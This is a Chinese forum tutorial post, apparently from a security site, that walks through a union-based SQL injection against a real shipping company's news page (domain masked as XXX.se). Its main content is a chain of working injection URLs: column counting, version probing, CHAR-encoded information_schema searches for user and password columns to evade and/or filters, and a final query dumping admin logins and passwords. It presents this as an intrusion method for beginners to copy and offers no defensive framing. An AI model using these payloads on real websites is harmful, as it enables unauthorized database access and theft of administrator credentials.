在写这篇文章之前,和他已经打过招呼了。此外如果你还单纯的用and 和or来进行注入检测这篇文章或许对您有用!
这篇文章应该奉献给我的老师,EgYpTion他来自国外,从他那里我学到很多技巧,针对SQL注入方式以及对web采点的方式。对于我是一个菜鸟来说,他操作真的熟练。现在介绍一下他入侵的方式,虽然很普通但很简练。换句话我们可以学到国外Hack的技术手法!
先申明下,这个网站是他为我演示操作SQL临时找的!
首先看下针对某一运输网站公司的注入
http://www.XXX.se/maritime/news.php?id=1048 注入点地址。
他注入的方式不同于我们国内采用 and 1-1 或 or 1=1方式进行回显来查看可否存在注入
他直接让数值返回空查可用字段也可以直接跳到下面
http://www.XXX.se/maritime/news.php?id=-1048+order+by+数值
这样的目的好处在于针对过滤and和or语句有很好的帮助!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,2,3--
发现可用字段2,3
又查看了下数据库版本
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,version(),3--
随后是他对于我这个菜鸟来说惊人的一目出来了!
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20117,%20115,%20101,%20114,%2037)--
接着
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,group_concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20112,%2097,%20115,%2037)--
最后结束
http://www.XXX.se/maritime/news.php?id=-1048+union+select+1,userpassword,UserLogin+from+cns_web.admin_users--
虽然文章对于一些技术高超的人来说不算什么,但是对于初学者应该会有一些帮助!
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)